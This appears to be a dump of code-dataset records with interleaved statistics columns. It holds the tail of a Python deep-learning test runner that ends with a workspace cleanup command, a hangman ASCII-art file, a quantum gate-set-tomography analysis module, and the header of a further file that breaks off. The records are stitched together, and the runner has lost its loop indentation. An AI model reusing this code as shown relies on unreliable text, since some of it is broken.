print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_adadelta(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_adagrad(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_nadam(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_signum(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_l1(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_l2(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_softmax_crossentropy(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_crossentropy(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_sigmoid_binary_crossentropy(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_binary_crossentropy(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_kldiv(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_poisson_nll(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_huber(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_hinge(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_squared_hinge(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_batch_normalization(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_instance_normalization(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_layer_normalization(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_identity(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_fully_connected(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_dropout(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_flatten(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_relu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_sigmoid(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_tanh(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_softplus(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_softsign(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_elu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_gelu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_prelu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_leaky_relu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_selu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_swish(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_concatenate(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_xavier_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_xavier_uniform(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_orthogonal_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_orthogonal_uniform(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_uniform(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_msra(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v1(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v2(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v1_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v2_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnext(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_mobilenet_v2_linear_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_mobilenet_v2_inverted_linear_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_squeezenet_fire(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_densenet(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_conv_bn_relu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_a(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_b(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_c(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_e(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_convolution1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_convolution2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_convolution3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_transposed_convolution1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_transposed_convolution2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_transposed_convolution3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
sys.stdout = open("test_logs.txt", 'a');
end = time.time();
print("Total Tests - {}".format(system_dict["total_tests"]));
print("Time Taken - {} sec".format(end-start));
print("Num Successful Tests - {}".format(system_dict["successful_tests"]));
print("Num Failed Tests - {}".format(len(system_dict["failed_tests_lists"])));
print("Num Skipped Tests - {}".format(len(system_dict["skipped_tests_lists"])));
print("");
for i in range(len(system_dict["failed_tests_lists"])):
print("{}. Failed Test:".format(i+1));
print("Name - {}".format(system_dict["failed_tests_lists"][i]));
print("Error - {}".format(system_dict["failed_tests_exceptions"][i]));
print("");
print("Skipped Tests List - {}".format(system_dict["skipped_tests_lists"]));
print("");
sys.stdout = origstdout;
print("Total Tests - {}".format(system_dict["total_tests"]));
print("Time Taken - {} sec".format(end-start));
print("Num Successful Tests - {}".format(system_dict["successful_tests"]));
print("Num Failed Tests - {}".format(len(system_dict["failed_tests_lists"])));
print("Num Skipped Tests - {}".format(len(system_dict["skipped_tests_lists"])));
print("See test_logs.txt for errors");
print("");
os.system("rm -r workspace");
| 34.305946
| 113
| 0.71027
| 3,938
| 31,733
| 5.380904
| 0.035043
| 0.159509
| 0.126097
| 0.078339
| 0.824351
| 0.761538
| 0.756064
| 0.747664
| 0.747664
| 0.747664
| 0
| 0.00595
| 0.136672
| 31,733
| 925
| 114
| 34.305946
| 0.767521
| 0
| 0
| 0.723032
| 0
| 0
| 0.284112
| 0.00145
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.122449
| 0
| 0.122449
| 0.501458
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
4851a0cf280b3b2915d816d047a7996605d57022
| 1,748
|
py
|
Python
|
Projects/Hangman/hangman_art.py
|
UsmanAhmadSaeed/Python
|
a28f9ef28b6d7a1558b02b89d9da9cd5e964270e
|
[
"MIT"
] | 12
|
2021-01-18T16:22:27.000Z
|
2021-11-30T04:38:27.000Z
|
Projects/Hangman/hangman_art.py
|
UsmanAhmadSaeed/Python
|
a28f9ef28b6d7a1558b02b89d9da9cd5e964270e
|
[
"MIT"
] | 31
|
2021-03-02T16:33:16.000Z
|
2022-03-30T04:01:15.000Z
|
Projects/Hangman/hangman_art.py
|
UsmanAhmadSaeed/Python
|
a28f9ef28b6d7a1558b02b89d9da9cd5e964270e
|
[
"MIT"
] | 31
|
2021-03-02T14:26:17.000Z
|
2022-01-30T16:51:08.000Z
|
stages = ['''
+---+
| |
O |
/|\ |
/ \ |
|
=========
''', '''
+---+
| |
O |
/|\ |
/ |
|
=========
''', '''
+---+
| |
O |
/|\ |
|
|
=========
''', '''
+---+
| |
O |
/| |
|
|
=========''', '''
+---+
| |
O |
| |
|
|
=========
''', '''
+---+
| |
O |
|
|
|
=========
''', '''
+---+
| |
|
|
|
|
=========
''']
logo = '''
_
| |
| |__ __ _ _ __ __ _ _ __ ___ __ _ _ __
| '_ \ / _` | '_ \ / _` | '_ ` _ \ / _` | '_ \
| | | | (_| | | | | (_| | | | | | | (_| | | | |
|_| |_|\__,_|_| |_|\__, |_| |_| |_|\__,_|_| |_|
__/ |
|___/
'''
game_over = '''
._._. ________ ________ ._._.
| | |/ _____/_____ _____ ____ \_____ \___ __ ___________ | | |
| | / \ ___\__ \ / \_/ __ \ / | \ \/ // __ \_ __ \ | | |
\|\\\ \_\ \/ __ \| Y Y \ ___/ / | \ /\ ___/| | \/ \|\|
____\______ (____ /__|_| /\___ > \_______ /\_/ \___ >__| ____
\/\/ \/ \/ \/ \/ \/ \/ \/\/
'''
you_won = '''
._._._____.___. __ __ ._._.
| | |\__ | | ____ __ __ / \ / \____ ____ | | |
| | | / | |/ _ \| | \ \ \/\/ / _ \ / \ | | |
\|\| \____ ( <_> ) | / \ ( <_> ) | \ \|\|
____ / ______|\____/|____/ \__/\ / \____/|___| / ____
\/\/ \/ \/ \/ \/\/
'''
| 20.091954
| 74
| 0.161899
| 14
| 1,748
| 2.285714
| 0.571429
| 0.3125
| 0.375
| 0.375
| 0.1875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.553776
| 1,748
| 87
| 75
| 20.091954
| 0.041026
| 0
| 0
| 0.47561
| 0
| 0.073171
| 0.931961
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f8c0cd1c2076363180a51bed7dae4bfb226be1c
| 9,785
|
py
|
Python
|
pycqed/analysis_v2/gate_set_tomography_analysis.py
|
nuttamas/PycQED_py3
|
1ee35c7428d36ed42ba4afb5d4bda98140b2283e
|
[
"MIT"
] | 60
|
2016-08-03T10:00:18.000Z
|
2021-11-10T11:46:16.000Z
|
pycqed/analysis_v2/gate_set_tomography_analysis.py
|
nuttamas/PycQED_py3
|
1ee35c7428d36ed42ba4afb5d4bda98140b2283e
|
[
"MIT"
] | 512
|
2016-08-03T17:10:02.000Z
|
2022-03-31T14:03:43.000Z
|
pycqed/analysis_v2/gate_set_tomography_analysis.py
|
nuttamas/PycQED_py3
|
1ee35c7428d36ed42ba4afb5d4bda98140b2283e
|
[
"MIT"
] | 34
|
2016-10-19T12:00:52.000Z
|
2022-03-19T04:43:26.000Z
|
import numpy as np
from collections import OrderedDict
from copy import deepcopy
import os
import pycqed.analysis_v2.base_analysis as ba
from pycqed.analysis import analysis_toolbox as a_tools
from pycqed.analysis import measurement_analysis as ma_old
import pygsti
from pycqed.measurement.gate_set_tomography.pygsti_helpers import \
gst_exp_filepath, pygsti_expList_from_dataset
class GST_SingleQubit_DataExtraction(ba.BaseDataAnalysis):
"""
Analysis class that extracts data from
"""
def __init__(self, t_start: str=None, t_stop: str=None,
label: str='', data_file_path: str=None,
options_dict: dict=None, extract_only: bool=False,
close_figs: bool=True,
do_fitting: bool=True, auto=True,
ch_idx: int = 0,
gst_exp_list_filepath: str=None):
super().__init__(t_start=t_start, t_stop=t_stop,
label=label,
data_file_path=data_file_path,
options_dict=options_dict,
close_figs=close_figs, extract_only=extract_only,
do_fitting=do_fitting)
self.gst_exp_list_filepath = gst_exp_list_filepath
self.ch_idx = ch_idx
if auto:
self.run_analysis()
def extract_data(self):
self.raw_data_dict = OrderedDict()
self.timestamps = a_tools.get_timestamps_in_range(
self.t_start, self.t_stop,
label=self.labels)
self.raw_data_dict['timestamps'] = self.timestamps
self.timestamp = self.timestamps[0]
a = ma_old.MeasurementAnalysis(
timestamp=self.timestamp, auto=False, close_file=False)
a.get_naming_and_values()
self.raw_data_dict['xvals'] = a.sweep_points
self.raw_data_dict['xlabel'] = a.parameter_names[0]
self.raw_data_dict['xunit'] = a.parameter_units[0]
self.raw_data_dict['bins'] = a.data_file['Experimental Data']['Experimental Metadata']['bins'].value
if self.gst_exp_list_filepath == None:
gst_exp_list_filename = a.data_file['Experimental Data'][
'Experimental Metadata'].attrs['gst_exp_list_filename']
self.raw_data_dict['gst_exp_list_filepath'] = os.path.join(
gst_exp_filepath, gst_exp_list_filename)
else:
self.raw_data_dict['gst_exp_list_filepath'] = \
self.gst_exp_list_filepath
self.raw_data_dict['expList'] = pygsti_expList_from_dataset(
self.raw_data_dict['gst_exp_list_filepath'])
self.raw_data_dict['measured_values'] = a.measured_values
self.raw_data_dict['value_names'] = a.value_names
self.raw_data_dict['value_units'] = a.value_units
self.raw_data_dict['measurementstring'] = a.measurementstring
self.measurementstring = a.measurementstring
self.raw_data_dict['folder'] = a.folder
a.finish()
def process_data(self):
"""
Involves reshaping the data and writing it to a dataset textfile
"""
self.proc_data_dict = deepcopy(self.raw_data_dict)
bins = self.proc_data_dict['bins']
self.proc_data_dict['binned_values'] = []
self.proc_data_dict['binned_values_stderr'] = []
expList = self.proc_data_dict['expList']
shots_1 = self.proc_data_dict['measured_values'][self.ch_idx]
print("Nr bins:", len(bins))
print("Nr gatestrings", len(expList))
# Filter out uncompleted iterations
missing_shots = (len(shots_1) % len(expList))
if missing_shots != 0:
shots_1 = shots_1[:-missing_shots]
shots_0 = 1 - shots_1
counts_1 = np.sum(shots_1.reshape(
(len(expList), -1),
order='F'), axis=1)
counts_0 = np.sum(shots_0.reshape(
(len(expList), -1),
order='F'), axis=1)
self.proc_data_dict['counts_0'] = counts_0
self.proc_data_dict['counts_1'] = counts_1
# writing to pygsti dataset
ds = pygsti.objects.DataSet(outcomeLabels=['0', '1'])
for i, gateString in enumerate(expList):
ds.add_count_dict(gateString,
{'0': counts_0[i],
'1': counts_1[i]})
ds.done_adding_data()
ds_name = self.measurementstring+self.timestamp+'_counts.txt'
dataset_fp = os.path.join(self.raw_data_dict['folder'], ds_name)
pygsti.io.write_dataset(dataset_fp, ds)
self.proc_data_dict['dataset'] = ds
self.proc_data_dict['dataset_fp'] = dataset_fp
class GST_TwoQubit_DataExtraction(ba.BaseDataAnalysis):
"""
Analysis class that extracts data from
"""
def __init__(self, t_start: str=None, t_stop: str=None,
label: str='', data_file_path: str=None,
options_dict: dict=None, extract_only: bool=False,
close_figs: bool=True,
do_fitting: bool=True, auto=True,
ch_idx0: int = 0,
ch_idx1: int = 1,
gst_exp_list_filepath: str=None):
super().__init__(t_start=t_start, t_stop=t_stop,
label=label,
data_file_path=data_file_path,
options_dict=options_dict,
close_figs=close_figs, extract_only=extract_only,
do_fitting=do_fitting)
self.gst_exp_list_filepath = gst_exp_list_filepath
self.ch_idx0 = ch_idx0
self.ch_idx1 = ch_idx1
if auto:
self.run_analysis()
def extract_data(self):
self.raw_data_dict = OrderedDict()
self.timestamps = a_tools.get_timestamps_in_range(
self.t_start, self.t_stop,
label=self.labels)
self.raw_data_dict['timestamps'] = self.timestamps
self.timestamp = self.timestamps[0]
a = ma_old.MeasurementAnalysis(
timestamp=self.timestamp, auto=False, close_file=False)
a.get_naming_and_values()
self.raw_data_dict['xvals'] = a.sweep_points
self.raw_data_dict['xlabel'] = a.parameter_names[0]
self.raw_data_dict['xunit'] = a.parameter_units[0]
self.raw_data_dict['bins'] = a.data_file['Experimental Data']['Experimental Metadata']['bins'].value
if self.gst_exp_list_filepath == None:
gst_exp_list_filename = a.data_file['Experimental Data'][
'Experimental Metadata'].attrs['gst_exp_list_filename']
self.raw_data_dict['gst_exp_list_filepath'] = os.path.join(
gst_exp_filepath, gst_exp_list_filename)
else:
self.raw_data_dict['gst_exp_list_filepath'] = \
self.gst_exp_list_filepath
self.raw_data_dict['expList'] = pygsti_expList_from_dataset(
self.raw_data_dict['gst_exp_list_filepath'])
self.raw_data_dict['measured_values'] = a.measured_values
self.raw_data_dict['value_names'] = a.value_names
self.raw_data_dict['value_units'] = a.value_units
self.raw_data_dict['measurementstring'] = a.measurementstring
self.measurementstring = a.measurementstring
self.raw_data_dict['folder'] = a.folder
a.finish()
def process_data(self):
"""
Involves reshaping the data and writing it to a dataset textfile
"""
self.proc_data_dict = deepcopy(self.raw_data_dict)
bins = self.proc_data_dict['bins']
self.proc_data_dict['binned_values'] = []
self.proc_data_dict['binned_values_stderr'] = []
expList = self.proc_data_dict['expList']
shots_q0 = self.proc_data_dict['measured_values'][self.ch_idx0]
shots_q1 = self.proc_data_dict['measured_values'][self.ch_idx1]
print("Nr bins:", len(bins))
print("Nr gatestrings", len(expList))
# Filter out uncompleted iterations
if (len(shots_q0) % len(expList))!= 0 :
shots_q0 = shots_q0[:-(len(shots_q0) % len(expList))]
shots_q1 = shots_q1[:-(len(shots_q1) % len(expList))]
# LSQ (q0) is last entry in list
shots_00 = (1-shots_q1) * (1-shots_q0)
shots_01 = (1-shots_q1) * (shots_q0)
shots_10 = (shots_q1) * (1-shots_q0)
shots_11 = (shots_q1) * (shots_q0)
counts_00 = np.sum(np.reshape(shots_00, (len(expList),
len(shots_00)//len(expList)), order='F'), axis=1)
counts_01 = np.sum(np.reshape(shots_01, (len(expList),
len(shots_01)//len(expList)), order='F'), axis=1)
counts_10 = np.sum(np.reshape(shots_10, (len(expList),
len(shots_10)//len(expList)), order='F'), axis=1)
counts_11 = np.sum(np.reshape(shots_11, (len(expList),
len(shots_11)//len(expList)), order='F'), axis=1)
# writing to pygsti dataset
outcomeLabels = [('00',), ('01',), ('10',), ('11',)]
ds = pygsti.objects.DataSet(outcomeLabels=outcomeLabels)
for i, gateString in enumerate(expList):
ds.add_count_dict(gateString,
{'00': counts_00[i], '01': counts_01[i],
'10': counts_10[i], '11': counts_11[i]})
ds.done_adding_data()
ds_name = self.measurementstring+self.timestamp+'_counts.txt'
dataset_fp = os.path.join(self.raw_data_dict['folder'], ds_name)
pygsti.io.write_dataset(dataset_fp, ds)
self.proc_data_dict['dataset'] = ds
self.proc_data_dict['dataset_fp'] = dataset_fp
| 40.26749
| 108
| 0.608176
| 1,240
| 9,785
| 4.464516
| 0.126613
| 0.07659
| 0.067558
| 0.092124
| 0.84104
| 0.790101
| 0.779082
| 0.764451
| 0.734465
| 0.734465
| 0
| 0.01806
| 0.281349
| 9,785
| 242
| 109
| 40.433884
| 0.769198
| 0.036689
| 0
| 0.715084
| 0
| 0
| 0.086589
| 0.017981
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03352
| false
| 0
| 0.050279
| 0
| 0.094972
| 0.022346
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f9ebffaaaf122bc0e80600bf3e9d0184e018e0e
| 896
|
py
|
Python
|
test/tests/instance_methods.py
|
lameiro/pyston
|
838e0ac98d5926ba942224951cd1e8bad5483b5e
|
[
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null |
test/tests/instance_methods.py
|
lameiro/pyston
|
838e0ac98d5926ba942224951cd1e8bad5483b5e
|
[
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null |
test/tests/instance_methods.py
|
lameiro/pyston
|
